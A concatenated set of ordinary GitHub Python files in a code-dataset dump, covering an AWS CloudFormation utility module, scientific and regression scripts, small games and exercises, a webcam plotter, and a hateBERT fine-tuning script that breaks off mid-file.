Giving \"\n \"up.\", function.func_name, attempts)\n raise\n logger.debug(\"Caught expected exception: %r\", e)\n # If there is a retry checker function, and it returned False,\n # do not retry\n else:\n raise\n time.sleep(sleep_time)\n\n\ndef camel_to_snake(name):\n \"\"\"Converts CamelCase to snake_case.\n\n Args:\n name (string): The name to convert from CamelCase to snake_case.\n\n Returns:\n string: Converted string.\n \"\"\"\n s1 = re.sub(\"(.)([A-Z][a-z]+)\", r\"\\1_\\2\", name)\n return re.sub(\"([a-z0-9])([A-Z])\", r\"\\1_\\2\", s1).lower()\n\n\ndef convert_class_name(kls):\n \"\"\"Gets a string that represents a given class.\n\n Args:\n kls (class): The class being analyzed for its name.\n\n Returns:\n string: The name of the given kls.\n \"\"\"\n return camel_to_snake(kls.__name__)\n\n\ndef create_route53_zone(conn, zone_name):\n \"\"\"Creates the given zone_name if it doesn't already exists.\n\n Also sets the SOA negative caching TTL to something short (300 seconds).\n\n Args:\n conn (:class:`boto.route53.Route53Connection`): The connection used\n to interact with Route53's API.\n zone_name (string): The name of the DNS hosted zone to create.\n \"\"\"\n if not zone_name.endswith(\".\"):\n zone_name += \".\"\n zone = conn.get_zone(zone_name)\n if not zone:\n logger.debug(\"Zone %s does not exist, creating.\", zone_name)\n zone = conn.create_zone(zone_name)\n # Update SOA to lower negative caching value\n soa = zone.find_records(zone_name, \"SOA\")\n old_soa_body = soa.resource_records[0]\n old_soa_parts = old_soa_body.split(\" \")\n # If the negative cache value is already 300, don't update it.\n if old_soa_parts[-1] == \"300\":\n return\n logger.debug(\"Updating negative caching value on zone %s to 300.\",\n zone_name)\n new_soa_body = \" \".join(old_soa_body.split(\" \")[:-1]) + \" 300\"\n changes = ResourceRecordSets(conn, zone.id)\n delete_soa = changes.add_change(\"DELETE\", zone.name, \"SOA\", soa.ttl)\n delete_soa.add_value(old_soa_body)\n create_soa = changes.add_change(\"CREATE\", zone.name, \"SOA\", soa.ttl)\n create_soa.add_value(new_soa_body)\n changes.commit()\n\n\ndef load_object_from_string(fqcn):\n \"\"\"Converts \".\" delimited strings to a python object.\n\n Given a \".\" delimited string representing the full path to an object\n (function, class, variable) inside a module, return that object. Example:\n\n load_object_from_string(\"os.path.basename\")\n load_object_from_string(\"logging.Logger\")\n load_object_from_string(\"LocalClassName\")\n \"\"\"\n module_path = \"__main__\"\n object_name = fqcn\n if \".\" in fqcn:\n module_path, object_name = fqcn.rsplit(\".\", 1)\n importlib.import_module(module_path)\n return getattr(sys.modules[module_path], object_name)\n\n\ndef uppercase_first_letter(s):\n \"\"\"Return string \"s\" with first character upper case.\"\"\"\n return s[0].upper() + s[1:]\n\n\ndef cf_safe_name(name):\n \"\"\"Converts a name to a safe string for a Cloudformation resource.\n\n Given a string, returns a name that is safe for use as a CloudFormation\n Resource. 
(ie: Only alphanumeric characters)\n \"\"\"\n alphanumeric = r\"[a-zA-Z0-9]+\"\n parts = re.findall(alphanumeric, name)\n return \"\".join([uppercase_first_letter(part) for part in parts])\n\n\n# TODO: perhaps make this a part of the builder?\ndef handle_hooks(stage, hooks, region, context):\n \"\"\" Used to handle pre/post_build hooks.\n\n These are pieces of code that we want to run before/after the builder\n builds the stacks.\n\n Args:\n stage (string): The current stage (pre_run, post_run, etc).\n hooks (list): A list of dictionaries containing the hooks to execute.\n region (string): The AWS region the current stacker run is executing\n in.\n context (:class:`stacker.context.Context`): The current stacker\n context.\n \"\"\"\n if not hooks:\n logger.debug(\"No %s hooks defined.\", stage)\n return\n\n hook_paths = []\n for i, h in enumerate(hooks):\n try:\n hook_paths.append(h[\"path\"])\n except KeyError:\n raise ValueError(\"%s hook #%d missing path.\" % (stage, i))\n\n logger.info(\"Executing %s hooks: %s\", stage, \", \".join(hook_paths))\n for hook in hooks:\n required = hook.get(\"required\", True)\n kwargs = hook.get(\"args\", {})\n try:\n method = load_object_from_string(hook[\"path\"])\n except (AttributeError, ImportError):\n logger.exception(\"Unable to load method at %s:\", hook[\"path\"])\n if required:\n raise\n continue\n try:\n result = method(\n region,\n context.namespace,\n context.mappings,\n context.parameters,\n **kwargs\n )\n except Exception:\n logger.exception(\"Method %s threw an exception:\", hook[\"path\"])\n if required:\n raise\n continue\n if not result:\n if required:\n logger.error(\"Required hook %s failed. Return value: %s\",\n hook[\"path\"], result)\n sys.exit(1)\n logger.warning(\"Non-required hook %s failed. 
Return value: %s\",\n hook[\"path\"], result)\n","repo_name":"chrishenry/stacker","sub_path":"stacker/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"5776800218","text":"#This script is to check for violations of the minimum image convention\n\nimport MDAnalysis as mda\nimport numpy as np\n\n\nprint('Enter your .gro file name:')\ngro_file = input()\n\nu=mda.Universe('TMD_KET_POPC.gro') \nprot=u.select_atoms('protein') \n\nprot_x=[]\nprot_y=[]\nprot_z=[]\n\n#obtain all coordinates in x,y and z for the protein and store in\n#repsective individual arrays\nfor shmleh in prot.positions:\n prot_x.append(shmleh[0])\n prot_y.append(shmleh[1])\n prot_z.append(shmleh[2])\n\n#extract the PBC coordinates from the last line of the gro file of interest\nwith open(gro_file) as f:\n for line in f:\n pass\n last_line = line\n\n#as these coordinates are extracted initially as a string, in the following lines\n#you are converting this to a float for each x,y,z of the pbc\n#Multiply by 10 to convert from nm to angstrom unit.\npbc=str.split(last_line)\npbc_x=np.float(pbc[0])*10\npbc_y=np.float(pbc[1])*10\npbc_z=np.float(pbc[2])*10\n\n#by taking the difference between the largest and smallest coordinate in x,y and z\n#you can obtain the dimensions of the protein\nprot_x_length=max(prot_x)-min(prot_x)\nprot_y_length=max(prot_y)-min(prot_y)\nprot_z_length=max(prot_z)-min(prot_z)\n\n#the difference between the dimensions of the protein and the PBC box\n#gives you the size of the buffer in each direction.\nx_buffer=prot_x_length-pbc_x\ny_buffer=prot_y_length-pbc_y\nz_buffer=prot_z_length-pbc_z\n\nprint(x_buffer)\nprint(y_buffer)\nprint(z_buffer)\n\n","repo_name":"Maxim-93/simulation_setup_scripts","sub_path":"min_img_con.py","file_name":"min_img_con.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19362790328","text":"num = input(\n 'Opa fala ai meu consagrado, preciso de um número inteiro, me diga um: '\n)\n\nif not num.isnumeric():\n print(\n 'O numero não é inteiro'\n )\nelse:\n num = int(num)\n if num % 2 == 0:\n print(\n 'O número é par'\n )\n elif num % 2 != 0:\n print(\n 'O número é ímpar'\n )\n\n","repo_name":"GabsDsgn/Python-Exercicios","sub_path":"Pacote Download/CursoemVideo/Mundo 1/ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25995886628","text":"def main(x): #having x as a parameter allows for smooth transition between pages\r\n ##### set up #####\r\n import pygame\r\n import constants\r\n import buttons\r\n import main_menu\r\n import random\r\n pygame.init()\r\n\r\n red = random.randint(50, 200)\r\n green = random.randint(50, 200) #not colour blind friendly\r\n blue = random.randint(50, 200)\r\n\r\n # (self, name, size_x, size_y, coor_x, coor_y, img) = arguments for creating 'ImgButton' instance\r\n main_menu_button = buttons.ImgButton(44, 44, constants.WIDTH//2 - 22, 27, 'home (Dave Gandy).png') # main menu button setup\r\n # Icon made by Dave Gandy from www.flaticon.com\r\n\r\n main_menu_icon = buttons.ImgButton(44, 44, 200, 280, 'home (Dave Gandy).png')\r\n main_menu_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #main_menu_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n settings_icon = buttons.ImgButton(44, 44, 
200, 350, 'settings (dmitri13).png')\r\n settings_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #settings_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n account_icon = buttons.ImgButton(44, 44, 150, 350, 'user (dmitri13).png')\r\n account_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #account_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n leaderboard_icon = buttons.ImgButton(44, 44, 100, 350, 'trophy (dmitri13).png')\r\n leaderboard_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #leaderboard_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n clock = pygame.time.Clock() #variables\r\n running = True\r\n mouse_pressed = False\r\n mouse_timer = 0\r\n goto_main = False #if these are set to True, when this loop ends that menu will be started.\r\n\r\n screen = constants.screen\r\n pygame.display.set_caption(\"Hurry!\")\r\n my_icon = constants.my_icon\r\n background = constants.background\r\n pygame.display.set_icon(my_icon)\r\n\r\n Title = constants.font65.render('(credits)', True, constants.WHITE)\r\n TitleRect = Title.get_rect()\r\n TitleRect.center = (constants.WIDTH / 2, 150)\r\n\r\n Dave_Gandy = \"Icon provided by 'Dave Gandy' from 'www.flaticon.com'\"\r\n Dave_Gandy_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Dave_Gandy, True, constants.RED)\r\n Dave_Gandy_titleRect = Dave_Gandy_title.get_rect()\r\n Dave_Gandy_titleRect.center = (414, 280)\r\n\r\n Dmitri13 = \"Icons provided by 'Dmitri13' from 'www.flaticon.com'\"\r\n Dmitri13_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Dmitri13, True, constants.RED)\r\n Dmitri13_titleRect = Dmitri13_title.get_rect()\r\n Dmitri13_titleRect.center = (410, 350)\r\n\r\n Nearoo = \"Text input boxes used text input library provided by 'Nearoo' on Github.\"\r\n Nearoo_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Nearoo, True, constants.RED)\r\n Nearoo_titleRect = Nearoo_title.get_rect()\r\n Nearoo_titleRect.center = (constants.WIDTH//2, 400)\r\n\r\n Alucard = \"Background provided by 'Alucard' on 'https://opengameart.org/content/city-background-repetitive-3.'\"\r\n Alucard_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Alucard, True, constants.RED)\r\n Alucard_titleRect = Alucard_title.get_rect()\r\n Alucard_titleRect.center = (constants.WIDTH//2, 430)\r\n\r\n FoxSynergy = \"BGM provided by 'FoxSynergy' on 'https://opengameart.org/content/blue-space.'\"\r\n FoxSynergy_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(FoxSynergy, True, constants.RED)\r\n FoxSynergy_titleRect = FoxSynergy_title.get_rect()\r\n FoxSynergy_titleRect.center = (constants.WIDTH//2, 460)\r\n\r\n Fupi = \"Button sfx provided by 'Fupi' on 'https://opengameart.org/content/8bit-menu-select.'\"\r\n Fupi_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Fupi, True, constants.RED)\r\n Fupi_titleRect = Fupi_title.get_rect()\r\n Fupi_titleRect.center = (constants.WIDTH//2, 490)\r\n\r\n ##### game loop #####\r\n while running:\r\n\r\n ##### get events #####\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n print(\"User asked to quit.\")\r\n running = False\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_pressed = True\r\n print(\"Mouse clicked\")\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if mouse_pressed == True:\r\n mouse_timer = round(mouse_timer, 4)\r\n print(\"User held mouse for \" + str(mouse_timer) + \" seconds.\")\r\n mouse_timer = 0 #only prints mouse button confirmation and duration after it's let go\r\n mouse_pressed = 
False\r\n\r\n ##### processes #####\r\n\r\n mouse_x = pygame.mouse.get_pos()[0]\r\n mouse_y = pygame.mouse.get_pos()[1] # get mouse position every frame\r\n\r\n if mouse_pressed == True:\r\n mouse_timer += 1 / 60\r\n\r\n main_menu_button.activate(mouse_pressed, mouse_x, mouse_y) # checks whether or not to activate the button\r\n\r\n if main_menu_button.get_activated() is True:\r\n running = False # ending loop and then starting next page makes sure multiple\r\n goto_main = True # game loops aren't running unnecessarily\r\n\r\n\r\n if x <= - 8500:\r\n x = constants.WIDTH + 5 # reset buildings if they go off screen\r\n x -= 15 # move buildings along\r\n\r\n red = random.randint(50, 200)\r\n green = random.randint(50, 200)\r\n blue = random.randint(50, 200) #not colour blind friendly\r\n main_menu_icon.set_colour([red, green, blue])\r\n settings_icon.set_colour([red, green, blue])\r\n account_icon.set_colour([red, green, blue])\r\n leaderboard_icon.set_colour([red, green, blue])\r\n\r\n ##### rendering #####\r\n\r\n screen.fill(constants.DARK_BLUE)\r\n\r\n pygame.draw.circle(screen, constants.NEAR_WHITE, [100, 100], 90, 0) # moon\r\n\r\n screen.blit(background, (x, -200))\r\n\r\n screen.blit(Title, TitleRect)\r\n\r\n screen.blit(Dave_Gandy_title, Dave_Gandy_titleRect)\r\n\r\n screen.blit(Dmitri13_title, Dmitri13_titleRect)\r\n\r\n screen.blit(Alucard_title, Alucard_titleRect)\r\n\r\n screen.blit(FoxSynergy_title, FoxSynergy_titleRect)\r\n\r\n screen.blit(Fupi_title, Fupi_titleRect)\r\n\r\n screen.blit(Nearoo_title, Nearoo_titleRect)\r\n\r\n # (screen, [red, blue, green], [left, top, width, height], filled) = arguments for drawing pygame rectangle\r\n pygame.draw.rect(screen, main_menu_button.colour, [main_menu_button.get_cx() - 24, main_menu_button.get_cy() - 24, 44, 44])\r\n screen.blit(main_menu_button.get_img(), (main_menu_button.get_cx() - 18, main_menu_button.get_cy() - 18))\r\n\r\n screen.blit(Title,TitleRect)\r\n\r\n pygame.draw.rect(screen, main_menu_icon.colour, [main_menu_icon.get_cx() - 24, main_menu_icon.get_cy() -24, 44, 44])\r\n screen.blit(main_menu_icon.get_img(), (main_menu_icon.get_cx() - 18, main_menu_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, settings_icon.colour, [settings_icon.get_cx() - 24, settings_icon.get_cy() - 24, 44, 44])\r\n screen.blit(settings_icon.get_img(), (settings_icon.get_cx() - 18, settings_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, account_icon.colour, [account_icon.get_cx() - 24, account_icon.get_cy() - 24, 44, 44])\r\n screen.blit(account_icon.get_img(), (account_icon.get_cx() - 18, account_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, leaderboard_icon.colour, [leaderboard_icon.get_cx() - 24, leaderboard_icon.get_cy() - 24, 44, 44])\r\n screen.blit(leaderboard_icon.get_img(), (leaderboard_icon.get_cx() - 18, leaderboard_icon.get_cy() - 18))\r\n\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n print(\"Closed credits menu.\") # ends this process and starts the next\r\n\r\n if goto_main == True:\r\n print(\"Opened main menu.\")\r\n main_menu.main(x) # runs main_settings menu","repo_name":"Hamzah2101/pygame_ui","sub_path":"credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38538659917","text":"import numpy as np \r\nimport os\r\ncasicero = 1e-15 \r\ndef GAUSS(A,B):\r\n AB = np.concatenate((A,B),axis=1)\r\n AB0 = np.copy(AB)\r\n tamano = np.shape(AB)\r\n n = tamano[0]\r\n m = 
tamano[1]\r\n for i in range(0,n-1,1):\r\n columna = abs(AB[i:,i])\r\n dondemax = np.argmax(columna)\r\n if (dondemax !=0):\r\n temporal = np.copy(AB[i,:])\r\n AB[i,:] = AB[dondemax+i,:]\r\n AB[dondemax+i,:] = temporal\r\n AB1 = np.copy(AB)\r\n for i in range(0,n-1,1):\r\n pivote = AB[i,i]\r\n adelante = i + 1\r\n for k in range(adelante,n,1):\r\n factor = AB[k,i]/pivote\r\n AB[k,:] = AB[k,:] - AB[i,:]*factor\r\n AB2 = np.copy(AB)\r\n ltfila = n-1\r\n ultcolumna = m-1\r\n for i in range(ltfila,0-1,-1):\r\n pivote = AB[i,i]\r\n atras = i-1 \r\n for k in range(atras,0-1,-1):\r\n factor = AB[k,i]/pivote\r\n AB[k,:] = AB[k,:] - AB[i,:]*factor\r\n AB[i,:] = AB[i,:]/AB[i,i]\r\n X = np.copy(AB[:,ultcolumna])\r\n X = np.transpose([X])\r\n return X\r\nx=[0,1,2,3,4,5,6]\r\ny=[-0.9,0,2,4.5,8.3,13,13,18]\r\nSr=0\r\nsumy=0\r\nsumx=0\r\nsumx2=0\r\nsumx3=0\r\nsumx4=0\r\nsumxy=0\r\nsumx2y=0\r\nn=len(x)\r\nfor i in range(len(x)):\r\n sumx+=x[i]\r\n sumx2+=x[i]*x[i]\r\n sumx3+=x[i]*x[i]*x[i]\r\n sumx4+=x[i]*x[i]*x[i]*x[i]\r\n sumy+=y[i]\r\n sumxy+=x[i]*y[i]\r\n sumx2y+=x[i]*x[i]*y[i]\r\nA = np.array([[n,sumx,sumx2],\r\n [sumx,sumx2,sumx3],\r\n [sumx2,sumx3,sumx4]])\r\nB = np.array([[sumy],\r\n [sumxy],\r\n [sumx2y]])\r\nprint(GAUSS(A,B))\r\na0=GAUSS(A,B)[0]\r\na1=GAUSS(A,B)[1]\r\na2=GAUSS(A,B)[2]\r\nSr=0\r\nfor i in range(len(x)):\r\n Sr+=(y[i]-a0-a1*x[i]-(a2*x[i]**2))**2\r\nprint(f\"La función resultante es y = {a0} + {a1}x + {a2}x2 + e\")\r\nprint(f\"El coeficiente de correlación es {Sr}\")\r\n\r\n","repo_name":"JuanYepes511/mc-202202-Juan-Yepes","sub_path":"Taller20.py","file_name":"Taller20.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9881578822","text":"from hec.heclib.dss import HecDss,DSSPathname,HecDataManager\nfrom hec.heclib.util import HecTime,HecDouble\nfrom hec.io import TimeSeriesContainer,TimeSeriesCollectionContainer\nfrom hec.dataTable import\tTimeSeriesDataModel\nfrom hec.script import Constants\n\n\ndef getContainers(dss,tag):\n\trval = TimeSeriesCollectionContainer()\n\tpaths = dss.getCondensedCatalog()\n\tfor cr in paths:\n\t\tp = cr.toString()\n\t\tif p.find(tag) >=0:\n\t\t\tpn = DSSPathname(p)\n\t\t\tpn.setDPart(\"\")\n\t\t\t#p.setFPart()\n\t\t\ttsc = dss.get(pn.toString())\n\t\t\t\n\t\t\trval.add(tsc)\n\treturn rval\n\ndef parseValue(val):\n\trval =0.0\n\tif isinstance(val,HecDouble):\n\t\trval = val.value()\n\telif val.toString().strip() == \"\":\n\t\trval = Constants.UNDEFINED\n\telse:\n\t\trval = float(val)\n\treturn rval\n\ndef getColumnArray(m,columnIndex):\n\trval = []\n\tnumberValues = m.getRowCount()\n\tfor i in range(0, numberValues):\n\t\tval = m.getValueAt(i,columnIndex)\n\t\trval.append(parseValue(val))\n\treturn rval\n\ndef getRowArray(m,rowIndex,offset):\n\trval = []\n\tfor i in range(offset, m.getColumnCount()-1):\n\t\trval.append(parseValue(m.getValueAt(rowIndex,i)))\n\treturn rval\n\ndef packageAsProfile(tscC, pathName):\n\n#\trval.times = tscC.getTimes()\n\tm = TimeSeriesDataModel()\n\tm.setData([tscC],False,0)\n\n\tcolumns = m.getDataColumns()\n\tprint(\"columns.size()\"+str(columns.size()))\n\tprint(\"m.getRowCount()\"+str(m.getRowCount()))\n\t\n\tnumberDepths = columns.size()\n\tnumberValues = m.getRowCount()\n\tprint (\"len(numberValues): \"+str(numberValues))\n\t\n\tprofileDepths=[]\n\tfor i in range(1,numberDepths):\n\t\tprofileDepths.append(i*1.0)\n\tprint (\"len(profileDepths): \"+str(len(profileDepths)))\n\n\toffset =3\n\tprofileValues = []\n\tfor 
i in range(offset, numberValues):\n\t\tr = getRowArray(m,i,offset)\n\t\tprofileValues.append(r)\n\tprint( profileValues\t)\n\t\n\ttsc1 = tscC.get(0)\n\trval = TimeSeriesContainer()\n\trval.setName(pathName)\n\trval.setStartTime(tsc1.startHecTime)\n\trval.setProfile(profileDepths, profileValues)\n\trval.setProfileDepthsUnits(tsc1.units)\n\t#rval.units = tsc1.units\n\trval.setProfileValuesUnits(tsc1.units)\n\trval.setType(\"Inst-Val\")\n\trval.profileLabel=\"profile - label -here\"\n\n\treturn rval\n\n\n\ndss_filename = R\"C:\\project\\DSSVue-Example-Scripts\\data\\forecast_data.dss\"\n\ndss = HecDss.open(dss_filename)\ntscC = getContainers(dss,'T:2021.09.01-0600')\npathName=\"//GAPT/Version-Flow-Out//6Hour/T:2021.09.01-0600|Fcst-MRBWM-GRFT/\"\nprofile = packageAsProfile(tscC,pathName)\ndss.put(profile)\n\ntscC = getContainers(dss,'T:2021.10.01-0600')\npathName=\"//GAPT/Version-Flow-Out//6Hour/T:2021.10.01-0600|Fcst-MRBWM-GRFT/\"\nprofile = packageAsProfile(tscC,pathName)\ndss.put(profile)\n\ndss.close()\n\n\n","repo_name":"HydrologicEngineeringCenter/DSSVue-Example-Scripts","sub_path":"src/forecast-versions/forecast-data-profile-struct.py","file_name":"forecast-data-profile-struct.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"25405947953","text":"\"\"\"\nExercise2 : Solution\n\n\"\"\"\nimport cv2\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nplt.style.use('dark_background') # Dark background for a prettier plot\n\n\ndef display_images():\n \"\"\"\n This function obtains results from generators and plot image and image intensity\n \"\"\"\n vc = cv2.VideoCapture(0) # Open webcam using opencv 0 = First available camera\n figure, ax = plt.subplots(1, 2, figsize=(10, 5))\n\n count = 0\n intensity = []\n g = stream_frames(vc)\n\n for i in g:\n # i[0] : rgb image\n # i[1] : intensity of image\n intensity.append(i[1])\n plot_image_and_brightness(axis=ax, image=i[0], imageintensity=intensity, framecount=count)\n count += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # Clean up if q is pressed\n plt.close('all')\n g.close()\n break\n\ndef stream_frames(video_capture):\n \"\"\"\n This generator function acquires images, convert to rgb, get mean intensity\n and yield necessary results\n :param video_capture: the video capture object from opencv\n :yield RGB_image\n Image Intensity\n \"\"\"\n try:\n while True:\n _, frame = video_capture.read() # Read image from webcam\n rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # Convert to rgb\n intensity = np.mean(rgb) # Get mean intensity\n yield rgb, intensity\n except GeneratorExit:\n print('Closing Cameras')\n video_capture.release()\n\n\ndef plot_image_and_brightness(axis, image, imageintensity, framecount):\n \"\"\"\n This function plots image and intensity of image through time\n :param axis: figure axis for plotting\n image: rgb image\n imageintensity: intensity of image\n framecount: present frame number\n \"\"\"\n\n # Plot RGB image\n axis[0].imshow(image)\n axis[0].axis('off')\n axis[0].set_title(f'Frame Number {framecount}')\n\n # Plot intensity\n axis[1].plot(imageintensity, '.-')\n axis[1].set_ylabel('Average Intensity')\n\n # Stuff to show and stream plot\n plt.show(block=False)\n 
plt.pause(0.001)\n\n\ndisplay_images()","repo_name":"seethakris/ASPPsamples","sub_path":"Exercise2_webcamstream_solution.py","file_name":"Exercise2_webcamstream_solution.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41183319886","text":"main_list = []\nwith open(\"input.txt\",\"r\") as input:\n    inputlst = [[item.split(\"|\")[0].strip().split(\" \"),item.split(\"|\")[1].strip().split(\" \")] for item in input.read().split(\"\\n\")]\n\nprint(inputlst[0])\n\nuniquelinecounts = [2, 4, 3, 7]\n\nthing_count = 0\n\nfor item in inputlst:\n    for thing in item[1]:\n        if len(thing) in uniquelinecounts:\n            thing_count +=1\n            print(thing)\n\nprint(f\"There are {thing_count} instances of number with a unique number of line segments\")\n\n# 6666\n# 5  4\n# 5  4\n# 3333\n# 2  1\n# 2  1\n# 0000\n\n# 1,2,3,4,5\n\nletters7 = [\"012456\",\"14\",\"02346\",\"01346\",\"1345\",\"01356\",\"012356\",\"146\",\"0123456\",\"013456\"]\n\ngrand_total = 0\n\nsetindex = {\"a\":0,\"b\":1,\"c\":2,\"d\":3,\"e\":4,\"f\":5,\"g\":6}\nsetindexinverse = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\"]\nfor item in inputlst:\n    final_letters = [\"\",\"\",\"\",\"\", \"\",\"\",\"\"]\n    number_codes = [\"\",\"\",\"\",\"\", \"\",\"\",\"\",\"\",\"\",\"\"]\n    uncatagorized = []\n\n\n    # Sorting the letters\n    for set in enumerate(item[0]):\n        if len(set[1]) in uniquelinecounts:\n            if len(set[1]) == 2: number_codes[1] = set[1]\n            if len(set[1]) == 3: number_codes[7] = set[1]\n            if len(set[1]) == 4: number_codes[4] = set[1]\n            if len(set[1]) == 7: number_codes[8] = set[1]\n\n        else:\n            uncatagorized.append(set[1])\n    letters = [0,0,0,0, 0,0,0]\n\n    # Getting the top part of the code (6)\n    difference = [letter for letter in number_codes[7] if letter not in number_codes[1]]\n\n    final_letters[6] = difference[0]\n\n    # Generating a list of the counts + letters for the non-sorted numbers\n    unsortedlettercounts = [[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"]]\n    for thing in uncatagorized:\n        for letter in thing:\n            unsortedlettercounts[setindex[letter]][0] += 1\n            unsortedlettercounts[setindex[letter]][1] = letter\n\n    # Getting letters based on the previous count\n    for char in unsortedlettercounts:\n        if char[0] == 3: final_letters[2] = char[1]\n        if char[0] == 6 and char[1] != final_letters[6]: final_letters[0] = char[1]\n        if char[0] == 5 and char[1] in number_codes[1]: final_letters[1] = char[1]\n        if char[0] == 4 and char[1] in number_codes[1]: final_letters[4] = char[1]\n        if char[0] == 5 and char[1] not in number_codes[1]: final_letters[3] = char[1]\n        if char[0] == 4 and char[1] not in number_codes[1]: final_letters[5] = char[1]\n\n\n    # Construct the numbers after the | in the original problem\n    current_num = \"\"\n    for num in item[1]:\n        letterstr = \"\"\n        for letter in num:\n            letterstr += str(final_letters.index(letter))\n        letterstr = \"\".join(str(sorted(letterstr)).translate(str.maketrans({\"[\":\"\",\"]\":\"\",\",\":\"\",\" \":\"\",\"'\":\"\",})))\n\n\n        if letterstr in letters7:\n            print(\"success\")\n            current_num = current_num+str(letters7.index(letterstr))\n        else:\n            print(\"error\")\n    grand_total += int(current_num)\n    print(\"iter---------------------------------------\")\n\nprint(f\"The total of all numbers displayed on the 7 segments displays is 
{grand_total}\")","repo_name":"MaximumMaxxx/AOC","sub_path":"day-8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18093987421","text":"\ndef isIn(test_value, string):\n string = string.lower()\n string = ''.join(sorted(string))\n if len(string) == 0:\n return False\n elif len(string) > 0:\n if len(string) == 1:\n if string == test_value:\n return True\n else:\n return False\n \n elif len(string) > 1:\n first = string[0]\n last = string[-1]\n middlevalue = len(string)//2\n if string[middlevalue] == test_value:\n return True\n else:\n if string[middlevalue] < test_value:\n return isIn(test_value, string[middlevalue:])\n else:\n return isIn(test_value, string[:middlevalue])\n \n \nprint(isIn('y', 'Python'))","repo_name":"mmbogajemimah/Algorithms","sub_path":"recur_strings3.py","file_name":"recur_strings3.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10767901384","text":"# Load model directly\nfrom transformers import AutoTokenizer, AutoModelForMaskedLM,BertForSequenceClassification\nfrom transformers import TrainingArguments,DataCollatorWithPadding,Trainer\nimport os\nimport evaluate\nimport numpy as np\nimport pandas as pd\nfrom datasets import Dataset\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\nnum_class = 2\ndevice = \"cuda\"\nid2label = {0: \"NEGATIVE\", 1: \"POSITIVE\"}\nlabel2id = {\"NEGATIVE\": 0, \"POSITIVE\": 1}\ncache_dir = '.'\ntokenizer = AutoTokenizer.from_pretrained(\"GroNLP/hateBERT\",cache_dir=cache_dir)\nmodel = BertForSequenceClassification.from_pretrained(\"GroNLP/hateBERT\",cache_dir=cache_dir,num_labels=2,id2label=id2label, label2id=label2id,)\n\n#load data\ntrain_path='./DiaSafety_dataset/train.json'\ntest_path = './DiaSafety_dataset/test.json'\ntrain_df = pd.read_json(train_path)\ntest_df = pd.read_json(test_path)\ntrain_dataset = Dataset.from_pandas(train_df)\ntest_dataset = Dataset.from_pandas(test_df)\nprint(train_dataset)\nprint(test_dataset)\n\n#preprocess data\ndef preprocess_function(examples):\n max_len =512\n context_list = [\"context:\"+context for context in examples[\"context\"]]\n response_list = [\"response:\"+response for response in examples[\"response\"]]\n label_list = [1 if label=='Safe' else 0 for label in examples[\"label\"]]\n toknized_data = tokenizer(context_list,response_list,\n padding='max_length', # Pad to max_length\n truncation=True, # Truncate to max_length\n max_length=max_len, \n return_tensors='pt')\n toknized_data['label'] = label_list\n return toknized_data\ntokenized_train_dataset = train_dataset.map(preprocess_function,batched=True)\ntokenized_test_dataset = test_dataset.map(preprocess_function,batched=True)\n\n\ndef compute_metrics(eval_pred):\n accuracy = evaluate.load(\"accuracy\")\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return accuracy.compute(predictions=predictions, references=labels)\n\ntraining_args = TrainingArguments(\n output_dir=\"./bert_on_DiaSafety\",\n learning_rate=2e-5,\n per_device_train_batch_size=16,\n per_device_eval_batch_size=16,\n num_train_epochs=20,\n weight_decay=0.01,\n evaluation_strategy=\"epoch\",\n save_strategy=\"epoch\",\n load_best_model_at_end=True,\n)\n\ndata_collator = DataCollatorWithPadding(tokenizer=tokenizer)\ntrainer = Trainer(\n model=model,\n args=training_args,\n 
